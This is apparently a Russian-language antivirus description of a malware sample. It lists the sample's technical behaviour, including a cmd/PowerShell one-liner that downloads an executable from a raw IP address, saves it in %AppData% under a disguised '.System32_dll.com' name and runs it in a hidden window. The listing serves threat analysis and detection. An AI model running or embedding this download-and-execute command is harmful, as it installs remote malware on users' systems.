Техническая информация
- http://121.186.148.250/jdjgyz.exe как %appdata%\.system32_dll.com
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://121.186.148.250/jdjgyz.exe','%AppData%\.System32_dll.com');Start-Process '%AppData%\.System32_dll.com'
- '12#.#86.148.250':80
- '<SYSTEM32>\cmd.exe' /c PowerShell (New-Object System.Net.WebClient).DownloadFile('http://121.186.148.250/jdjgyz.exe','%AppData%\.System32_dll.com');Start-Process '%AppData%\.System32_dll.com'' (со скрытым окном)